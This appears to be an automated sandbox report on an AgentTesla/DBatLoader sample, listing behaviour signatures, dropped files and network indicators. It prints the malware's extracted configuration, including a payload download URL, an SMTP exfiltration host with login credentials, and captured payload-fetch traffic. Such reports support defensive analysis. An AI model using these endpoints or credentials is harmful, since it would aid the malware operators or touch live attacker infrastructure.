Windows Analysis Report
2jbMIxCFsK.exe

Overview

General Information

Sample name: 2jbMIxCFsK.exe
renamed because original name is a hash value
Original sample name: 054899796d592bb5f70b0a9fa28429024a919270a76603626be24068faae59d9.exe
Analysis ID: 1562866
MD5: 67dac6ae9ee770115db85cc71979dc41
SHA1: a708539ebb312329f56f064a8491e4c6e1bd7ce8
SHA256: 054899796d592bb5f70b0a9fa28429024a919270a76603626be24068faae59d9
Tags: doganalecmdexeuser-JAMESWT_MHT

Detection

AgentTesla, DBatLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected DBatLoader
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates many large memory junks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Infects executable files (exe, dll, sys, html)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: DBatLoader
Description: This Delphi loader misuses Cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

AV Detection

Source: 2jbMIxCFsK.exe Avira: detected
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Avira: detection malicious, Label: HEUR/AGEN.1311721
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Avira: detection malicious, Label: HEUR/AGEN.1311721
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Avira: detection malicious, Label: HEUR/AGEN.1325995
Source: 2jbMIxCFsK.exe Malware Configuration Extractor: DBatLoader {"Download Url": ["https://gxe0.com/yak/233_Wisrysxlfss"]}
Source: 9.0.neworigin.exe.240000.0.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}
Source: C:\Users\Public\Libraries\Wisrysxl.PIF ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe ReversingLabs: Detection: 91%
Source: 2jbMIxCFsK.exe ReversingLabs: Detection: 57%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Joe Sandbox ML: detected
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Joe Sandbox ML: detected
Source: 2jbMIxCFsK.exe Joe Sandbox ML: detected
Source: 2jbMIxCFsK.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown HTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49752 version: TLS 1.2
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: lxsyrsiW.pif, 00000008.00000003.2167425399.000000002BD60000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: 2jbMIxCFsK.exe, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D67000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050057116.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020CC3000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2166786184.0000000002226000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000004.00000003.2139143163.0000000005050000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000005.00000003.2144839901.0000000004A20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbH source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D67000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2143795019.000000002226F000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2143795019.000000002223E000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2173838479.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050057116.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020CC3000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050268749.0000000002C2C000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2166786184.0000000002226000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: esentutl.exe, 00000004.00000003.2139143163.0000000005050000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ping.pdb source: esentutl.exe, 00000005.00000003.2144839901.0000000004A20000.00000004.00001000.00020000.00000000.sdmp

Spreading

Source: C:\Users\Public\Libraries\lxsyrsiW.pif System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E65908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_02E65908
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Code function: 4x nop then jmp 028B7394h 10_2_028B7108
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Code function: 4x nop then jmp 028B78DCh 10_2_028B767A
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 10_2_028B7E60
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 10_2_028B7E5E
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Code function: 4x nop then jmp 065BBCBDh 15_2_065BBA40

Networking

Source: Malware configuration extractor URLs: https://gxe0.com/yak/233_Wisrysxlfss
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7E4B8 InternetCheckConnectionA, 0_2_02E7E4B8
Source: global traffic TCP traffic: 192.168.2.5:49707 -> 51.195.88.199:587
Source: Joe Sandbox View IP Address: 198.252.105.91 198.252.105.91
Source: Joe Sandbox View IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknown DNS query: name: api.ipify.org
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 198.252.105.91:443
Source: global traffic HTTP traffic detected: GET /yak/233_Wisrysxlfss HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: gxe0.com
Source: global traffic DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic DNS traffic detected: DNS query: api.ipify.org
Source: global traffic DNS traffic detected: DNS query: s82.gocheapweb.com
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: powershell.exe, 0000000B.00000002.2278069246.0000000005C09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0C
Source: powershell.exe, 0000000B.00000002.2254342461.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: neworigin.exe, 00000009.00000002.2419547129.0000000005DBE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2419547129.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2417679749.0000000005D10000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000018.00000002.4530947899.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r11.i.lencr.org/0
Source: neworigin.exe, 00000009.00000002.2419547129.0000000005DBE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2419547129.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2417679749.0000000005D10000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000018.00000002.4530947899.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r11.o.lencr.org0#
Source: neworigin.exe, 00000009.00000002.2359317927.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000018.00000002.4540086325.000000000290C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://s82.gocheapweb.com
Source: powershell.exe, 0000000B.00000002.2254342461.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: neworigin.exe, 00000009.00000002.2359317927.0000000002661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2254342461.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000B.00000002.2254342461.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.2254342461.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2286081090.00000000075F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000B.00000002.2286081090.00000000075F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.
Source: 2jbMIxCFsK.exe, 2jbMIxCFsK.exe, 00000000.00000002.2224009200.000000002229C000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D44000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050268749.0000000002CCD000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2173838479.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2237079375.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020CC3000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2225406008.00000000225FF000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2224009200.000000002223D000.00000004.00000020.00020000.00000000.sdmp, lxsyrsiW.pif, 00000008.00000000.2153332087.0000000000416000.00000002.00000001.01000000.00000006.sdmp, Wisrysxl.PIF, 00000016.00000002.2321565604.0000000002E22000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000017.00000000.2301803862.0000000000416000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: http://www.pmail.com
